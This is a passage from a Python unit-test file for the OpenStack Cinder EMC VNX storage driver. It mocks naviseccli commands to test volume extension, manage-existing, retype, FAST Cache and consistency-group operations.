mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol1', '-attachedSnapshot'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.SNAP_DELETE_CMD(tmp_snap))]
fake_cli.assert_has_calls(expect_cmd)
def test_delete_volume_failed(self):
commands = [self.testData.LUN_DELETE_CMD('failed_vol1')]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(EMCVnxCLICmdError,
self.driver.delete_volume,
self.testData.test_failed_volume)
expected = [mock.call(*self.testData.LUN_DELETE_CMD('failed_vol1'))]
fake_cli.assert_has_calls(expected)
def test_extend_volume(self):
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol1')]
results = [self.testData.LUN_PROPERTY('vol1', size=2)]
fake_cli = self.driverSetup(commands, results)
# case
self.driver.extend_volume(self.testData.test_volume, 2)
expected = [mock.call(*self.testData.LUN_EXTEND_CMD('vol1', 2)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD(
'vol1'))]
fake_cli.assert_has_calls(expected)
def test_extend_volume_has_snapshot(self):
commands = [self.testData.LUN_EXTEND_CMD('failed_vol1', 2)]
results = [FAKE_ERROR_RETURN]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(EMCVnxCLICmdError,
self.driver.extend_volume,
self.testData.test_failed_volume,
2)
expected = [mock.call(*self.testData.LUN_EXTEND_CMD('failed_vol1', 2))]
fake_cli.assert_has_calls(expected)
def test_extend_volume_failed(self):
commands = [self.testData.LUN_PROPERTY_ALL_CMD('failed_vol1')]
results = [self.testData.LUN_PROPERTY('failed_vol1', size=2)]
fake_cli = self.driverSetup(commands, results)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.testData.test_failed_volume,
3)
expected = [
mock.call(
*self.testData.LUN_EXTEND_CMD('failed_vol1', 3)),
mock.call(
*self.testData.LUN_PROPERTY_ALL_CMD('failed_vol1'))]
fake_cli.assert_has_calls(expected)
def test_create_remove_export(self):
fake_cli = self.driverSetup()
self.driver.create_export(None, self.testData.test_volume)
self.driver.remove_export(None, self.testData.test_volume)
expected = [mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1'))]
fake_cli.assert_has_calls(expected)
def test_manage_existing(self):
"""Unit test for the manage_existing function
of driver
"""
get_lun_cmd = ('lun', '-list', '-l', self.testData.test_lun_id,
'-state', '-userCap', '-owner',
'-attachedSnapshot', '-poolName')
lun_rename_cmd = ('lun', '-modify', '-l', self.testData.test_lun_id,
'-newName', 'vol_with_type', '-o')
commands = [get_lun_cmd, lun_rename_cmd]
results = [self.testData.LUN_PROPERTY('lun_name'), SUCCEED]
self.configuration.storage_vnx_pool_name = \
self.testData.test_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
self.driver.manage_existing(
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
expected = [mock.call(*get_lun_cmd),
mock.call(*lun_rename_cmd)]
fake_cli.assert_has_calls(expected)
def test_manage_existing_lun_in_another_pool(self):
"""Unit test for the manage_existing function
of driver with a invalid pool backend.
An exception would occur in this case
"""
get_lun_cmd = ('lun', '-list', '-l', self.testData.test_lun_id,
'-state', '-userCap', '-owner',
'-attachedSnapshot', '-poolName')
commands = [get_lun_cmd]
results = [self.testData.LUN_PROPERTY('lun_name')]
invalid_pool_name = "fake_pool"
self.configuration.storage_vnx_pool_name = invalid_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
ex = self.assertRaises(
exception.ManageExistingInvalidReference,
self.driver.manage_existing,
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
self.assertTrue(
re.match(r'.*not in a manageable pool backend by cinder',
ex.msg))
expected = [mock.call(*get_lun_cmd)]
fake_cli.assert_has_calls(expected)
def test_manage_existing_get_size(self):
"""Unit test for the manage_existing_get_size
function of driver.
"""
get_lun_cmd = ('lun', '-list', '-l', self.testData.test_lun_id,
'-state', '-status', '-opDetails', '-userCap', '-owner',
'-attachedSnapshot')
test_size = 2
commands = [get_lun_cmd]
results = [self.testData.LUN_PROPERTY('lun_name', size=test_size)]
self.configuration.storage_vnx_pool_name = \
self.testData.test_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
get_size = self.driver.manage_existing_get_size(
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
expected = [mock.call(*get_lun_cmd)]
assert get_size == test_size
fake_cli.assert_has_calls(expected)
        # Test the function with an invalid reference.
        invalid_ref = {'fake': 'fake_ref'}
        self.assertRaises(exception.ManageExistingInvalidReference,
                          self.driver.manage_existing_get_size,
                          self.testData.test_volume_with_type,
                          invalid_ref)
def test_manage_existing_with_array_backend(self):
"""Unit test for the manage_existing with the
array backend which is not support the manage
existing functinality.
"""
#Set up the array backend
config = conf.Configuration(None)
config.append_config_values = mock.Mock(return_value=0)
config.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
config.san_ip = '10.0.0.1'
config.san_login = 'sysadmin'
config.san_password = 'sysadmin'
config.default_timeout = 0.0002
config.initiator_auto_registration = True
config.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
config.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
self.driver = EMCCLIISCSIDriver(configuration=config)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliArray)
        # prepare the fake CLI command and result
lun_rename_cmd = ('lun', '-modify', '-l', self.testData.test_lun_id,
'-newName', 'vol_with_type', '-o')
commands = [lun_rename_cmd]
results = [SUCCEED]
#mock the command executor
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.MagicMock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
self.driver.manage_existing(
self.testData.test_volume_with_type,
self.testData.test_existing_ref)
expected = [mock.call(*lun_rename_cmd)]
fake_cli.assert_has_calls(expected)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase."
"get_lun_id_by_name",
mock.Mock(return_value=1))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_compressed_to_deduplicated(self):
"""Unit test for retype compressed to deduplicated."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('compressed',
'deduplicated')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'deduplicated'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'compressed'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool', 'deduplicated', None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol3-123456')),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_thin_to_compressed_auto(self):
"""Unit test for retype thin to compressed and auto tiering."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('thin',
'compressed'),
'storagetype:tiering': (None, 'auto')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'compressed',
'storagetype:tiering': 'auto'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool', 'compressed', 'auto')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(1)),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
def test_retype_pool_changed_dedup_to_compressed_auto(self):
"""Unit test for retype dedup to compressed and auto tiering
and pool changed
"""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('deduplicated',
'compressed'),
'storagetype:tiering': (None, 'auto'),
'storagetype:pool': ('unit_test_pool',
'unit_test_pool2')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'compressed',
'storagetype:tiering': 'auto',
'storagetype:pool':
'unit_test_pool2'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool2|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'deduplicated',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool2', 'compressed', 'auto')),
mock.call(*self.testData.ENABLE_COMPRESSION_CMD(1)),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_compressed_auto_to_compressed_nomovement(self):
"""Unit test for retype only tiering changed."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:tiering': ('auto', 'nomovement')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'compressed',
'storagetype:tiering': 'nomovement',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'compressed',
'storagetype:pool': 'unit_test_pool',
'storagetype:tiering': 'auto'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('lun', '-modify', '-name', 'vol3', '-o', '-initialTier',
'optimizePool', '-tieringPolicy', 'noMovement')]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_compressed_to_thin_cross_array(self):
"""Unit test for retype cross array."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('compressed', 'thin')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning': 'thin',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_2',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500891',
'volume_backend_name': 'pool_backend_2',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
retyped = self.driver.retype(None, self.testData.test_volume3,
new_type_data, diff_data,
host_test_data)
self.assertFalse(retyped,
"Retype should failed due to"
" different protocol or array")
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
@mock.patch(
"time.time",
mock.Mock(return_value=123456))
    def test_retype_thin_auto_to_dedup_diff_protocol(self):
        """Unit test for retype to a different protocol."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('thin', 'deduplicated'),
'storagetype:tiering': ('auto', None)}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning':
'deduplicated',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_2',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_2',
'storage_protocol': 'FC'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('No snap', 1023)]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:tiering': 'auto',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
expect_cmd = [
mock.call('snap', '-list', '-res', 1),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol3-123456', 2, 'unit_test_pool', 'deduplicated', None)),
mock.call(*self.testData.MIGRATION_CMD(), retry_disable=True)]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_thin_auto_has_snap_to_thick_highestavailable(self):
"""Unit test for retype volume has snap when need migration."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provsioning': ('thin', None),
'storagetype:tiering': ('auto', 'highestAvailable')}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:tiering':
'highestAvailable',
'storagetype:pool':
'unit_test_pool'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD,
('snap', '-list', '-res', 1)]
results = [self.testData.NDU_LIST_RESULT,
('Has snap', 0)]
self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:tiering': 'auto',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
retyped = self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
self.assertFalse(retyped,
"Retype should failed due to"
" different protocol or array")
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.EMCVnxCliBase.get_lun_id",
mock.Mock(return_value=1))
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 1}))
def test_retype_thin_auto_to_thin_auto(self):
"""Unit test for retype volume which has no change."""
diff_data = {'encryption': {}, 'qos_specs': {},
'extra_specs': {}}
new_type_data = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:tiering':
'auto',
'storagetype:provisioning':
'thin'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
host_test_data = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'unit_test_pool|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
commands = [self.testData.NDU_LIST_CMD]
results = [self.testData.NDU_LIST_RESULT]
self.driverSetup(commands, results)
self.driver.cli.enablers = ['-Compression',
'-Deduplication',
'-ThinProvisioning',
'-FAST']
CommandLineHelper.get_array_serial = mock.Mock(
return_value={'array_serial': "FNM00124500890"})
extra_specs = {'storagetype:provisioning': 'thin',
'storagetype:tiering': 'auto',
'storagetype:pool': 'unit_test_pool'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
self.driver.retype(None, self.testData.test_volume3,
new_type_data,
diff_data,
host_test_data)
def test_create_volume_with_fastcache(self):
        """Test enabling FAST Cache when creating a volume."""
extra_specs = {'fast_cache_enabled': 'True'}
volume_types.get_volume_type_extra_specs = \
mock.Mock(return_value=extra_specs)
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol_with_type'),
self.testData.NDU_LIST_CMD,
self.testData.CHECK_FASTCACHE_CMD(
self.testData.test_pool_name)]
results = [self.testData.LUN_PROPERTY('vol_with_type', True),
SUCCEED,
('FAST Cache: Enabled', 0)]
fake_cli = self.driverSetup(commands, results)
lun_info = {'lun_name': "vol_with_type",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready",
'status': 'OK(0x0)',
'operation': 'None'
}
self.configuration.storage_vnx_pool_name = \
self.testData.test_pool_name
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
assert isinstance(self.driver.cli, emc_vnx_cli.EMCVnxCliPool)
cli_helper = self.driver.cli._client
cli_helper.command_execute = fake_cli
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.get_enablers_on_array = mock.Mock(return_value="-FASTCache")
self.driver.update_volume_stats()
self.driver.create_volume(self.testData.test_volume_with_type)
self.assertEqual(self.driver.cli.stats['fast_cache_enabled'], 'True')
expect_cmd = [
mock.call('storagepool', '-list', '-name',
'Pool_02_SASFLASH', '-userCap', '-availableCap'),
mock.call('-np', 'storagepool', '-list', '-name',
'Pool_02_SASFLASH', '-fastcache'),
mock.call('lun', '-create', '-capacity',
1, '-sq', 'gb', '-poolName', 'Pool_02_SASFLASH',
'-name', 'vol_with_type', '-type', 'NonThin')
]
fake_cli.assert_has_calls(expect_cmd)
def test_get_lun_id_provider_location_exists(self):
        """Test get_lun_id when provider_location contains the LUN id."""
self.driverSetup()
volume_01 = {
'name': 'vol_01',
'size': 1,
'volume_name': 'vol_01',
'id': '1',
'name_id': '1',
'provider_location': 'system^FNM11111|type^lun|lun_id^1',
'project_id': 'project',
'display_name': 'vol_01',
'display_description': 'test volume',
'volume_type_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]}
self.assertEqual(self.driver.cli.get_lun_id(volume_01), 1)
@mock.patch(
"cinder.volume.drivers.emc.emc_vnx_cli.CommandLineHelper." +
"get_lun_by_name",
mock.Mock(return_value={'lun_id': 2}))
def test_get_lun_id_provider_location_has_no_lun_id(self):
        """Test get_lun_id when provider_location has no LUN id."""
self.driverSetup()
volume_02 = {
'name': 'vol_02',
'size': 1,
'volume_name': 'vol_02',
'id': '2',
'provider_location': 'system^FNM11111|type^lun|',
'project_id': 'project',
'display_name': 'vol_02',
'display_description': 'test volume',
'volume_type_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]}
self.assertEqual(self.driver.cli.get_lun_id(volume_02), 2)
def test_create_consistency_group(self):
cg_name = self.testData.test_cg['id']
commands = [self.testData.CREATE_CONSISTENCYGROUP_CMD(cg_name)]
results = [SUCCEED]
fake_cli = self.driverSetup(commands, results)
model_update = self.driver.create_consistencygroup(
None, self.testData.test_cg)
self.assertDictMatch({'status': 'available'}, model_update)
expect_cmd = [
mock.call(
*self.testData.CREATE_CONSISTENCYGROUP_CMD(
cg_name))]
fake_cli.assert_has_calls(expect_cmd)
def test_delete_consistency_group(self):
cg_name = self.testData.test_cg['id']
commands = [self.testData.DELETE_CONSISTENCYGROUP_CMD(cg_name),
self.testData.LUN_DELETE_CMD('vol1')]
results = [SUCCEED, SUCCEED]
fake_cli = self.driverSetup(commands, results)
self.driver.db = mock.MagicMock()
self.driver.db.volume_get_all_by_group.return_value =\
self.testData.CONSISTENCY_GROUP_VOLUMES()
self.driver.delete_consistencygroup(None,
self.testData.test_cg)
expect_cmd = [
mock.call(
*self.testData.DELETE_CONSISTENCYGROUP_CMD(
cg_name)),
mock.call(
*self.testData.LUN_DELETE_CMD('vol1')),
mock.call(
*self.testData.LUN_DELETE_CMD('vol1'))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_cgsnapshot(self):
cgsnapshot = self.testData.test_cgsnapshot['id']
cg_name = self.testData.test_cgsnapshot['consistencygroup_id']
commands = [self.testData.CREATE_CG_SNAPSHOT(cg_name, cgsnapshot)]
results = [SUCCEED]
fake_cli = self.driverSetup(commands, results)
self.driver.db = mock.MagicMock()
self.driver.db.volume_get_all_by_group.return_value =\
self.testData.SNAPS_IN_SNAP_GROUP()
self.driver.create_cgsnapshot(None, self.testData.test_cgsnapshot)
expect_cmd = [
mock.call(
*self.testData.CREATE_CG_SNAPSHOT(
cg_name, cgsnapshot))]
fake_cli.assert_has_calls(expect_cmd)
def test_delete_cgsnapshot(self):
snap_name = self.testData.test_cgsnapshot['id']
commands = [self.testData.DELETE_CG_SNAPSHOT(snap_name)]
results = [SUCCEED]
fake_cli = self.driverSetup(commands, results)
self.driver.db = mock.MagicMock()
self.driver.db.snapshot_get_all_for_cgsnapshot.return_value =\
self.testData.SNAPS_IN_SNAP_GROUP()
self.driver.delete_cgsnapshot(None,
self.testData.test_cgsnapshot)
expect_cmd = [
mock.call(
*self.testData.DELETE_CG_SNAPSHOT(
snap_name))]
fake_cli.assert_has_calls(expect_cmd)
@mock.patch(
"eventlet.event.Event.wait",
mock.Mock(return_value=None))
def test_add_volume_to_cg(self):
commands = [self.testData.LUN_PROPERTY_ALL_CMD('vol1'),
self.testData.ADD_LUN_TO_CG_CMD('cg_id', 1),
self.testData.GET_CG_BY_NAME_CMD('cg_id')
]
results = [self.testData.LUN_PROPERTY('vol1', True),
SUCCEED,
self.testData.CG_PROPERTY('cg_id')]
fake_cli = self.driverSetup(commands, results)
self.driver.create_volume(self.testData.test_volume_cg)
expect_cmd = [
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1', 1,
'unit_test_pool',
None, None)),
mock.call('lun', '-list', '-name', 'vol1',
'-state', '-status', '-opDetails',
'-userCap', '-owner', '-attachedSnapshot'),
mock.call(*self.testData.ADD_LUN_TO_CG_CMD(
'cg_id', 1))]
fake_cli.assert_has_calls(expect_cmd)
    def test_create_cloned_volume_from_consistency_group(self):
cmd_smp = ('lun', '-list', '-name', 'vol1', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol1
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol1_dest")
output_dest = self.testData.LUN_PROPERTY("vol1_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
cg_name = self.testData.test_cgsnapshot['consistencygroup_id']
commands = [cmd_smp, cmd_dest, cmd_migrate,
cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.driver.create_cloned_volume(self.testData.test_volume_clone_cg,
self.testData.test_clone_cg)
tmp_cgsnapshot = 'tmp-cgsnapshot-' + self.testData.test_volume['id']
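        # A temporary cgsnapshot of the source consistency group is created,
        # used as the clone source, and deleted after the migration completes.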
expect_cmd = [
mock.call(
*self.testData.CREATE_CG_SNAPSHOT(cg_name, tmp_cgsnapshot)),
mock.call(*self.testData.SNAP_MP_CREATE_CMD(name='vol1',
source='clone1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol1', snapName=tmp_cgsnapshot)),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol1_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol1', '-attachedSnapshot'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call(*self.testData.DELETE_CG_SNAPSHOT(tmp_cgsnapshot))]
fake_cli.assert_has_calls(expect_cmd)
def test_create_volume_from_cgsnapshot(self):
